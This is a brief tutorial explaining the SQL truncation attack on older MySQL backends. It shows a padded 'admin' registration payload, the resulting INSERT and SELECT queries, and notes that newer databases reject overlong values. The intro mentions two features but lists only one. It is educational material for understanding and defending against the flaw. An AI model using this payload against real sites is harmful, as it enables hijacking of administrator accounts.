It's an attack that no longer works in the latest MySQL versions.
- MySQL database backend
A SQL Truncation attack takes advantage of two features in MySQL to subvert application logic. These features are:
- 1.If the length of a VARCHAR is exceeded, then the rest of it is simply cut off (truncated) - this is no longer a feature of MySQL.
Note: This attack doesn't work in newer MySQL versions and other databases like PostgreSQL because an error is thrown when the length of a VARCHAR is exceeded.
Let's say there's a website with a MySQL backend and a users table, where the username is of type
VARCHAR(20). Let's also say that there is an admin account
Register the following user:
admin (lots of spaces in between)And then whatever
It produces the following SQL query:
INSERT INTO users (name, password) VALUES ('admin (lots of spaces in between)And then whatever', 'mypassword123');
Because of SQL truncation to 20 characters, the above is effectively the same as:
INSERT INTO users (name, password) VALUES ('admin ', 'mypassword123');
When you later try to log in with
admin:mypassword123, then that produce the following query:
SELECT * FROM users WHERE username='admin ' AND password='mypassword123'